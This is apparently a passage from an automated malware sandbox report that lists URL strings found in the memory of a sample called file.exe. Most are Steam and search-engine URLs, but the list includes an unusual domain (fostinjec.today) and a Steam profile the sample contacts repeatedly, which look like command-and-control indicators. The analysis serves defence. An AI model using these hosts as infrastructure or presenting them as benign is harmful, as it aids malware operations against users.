00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.today:443/LksNAzf
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: file.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/2
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: file.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/Z
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: file.exe, 00000000.00000003.1164445689.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/j
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: file.exe, 00000000.00000003.1164445689.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193404860.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193325992.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194553628.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/
            Source: file.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128R
            Source: file.exe, 00000000.00000003.1164445689.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128Z
            Source: file.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128b
            Source: file.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128r
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: file.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/z
            Source: file.exe, 00000000.00000003.1136822746.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: file.exe, 00000000.00000003.919467475.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103138015.0000000005403000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103138015.00000000053F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103138015.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005403000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005409000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005406000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: file.exe, 00000000.00000003.919467475.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103138015.00000000053F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
            Source: file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136576601.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
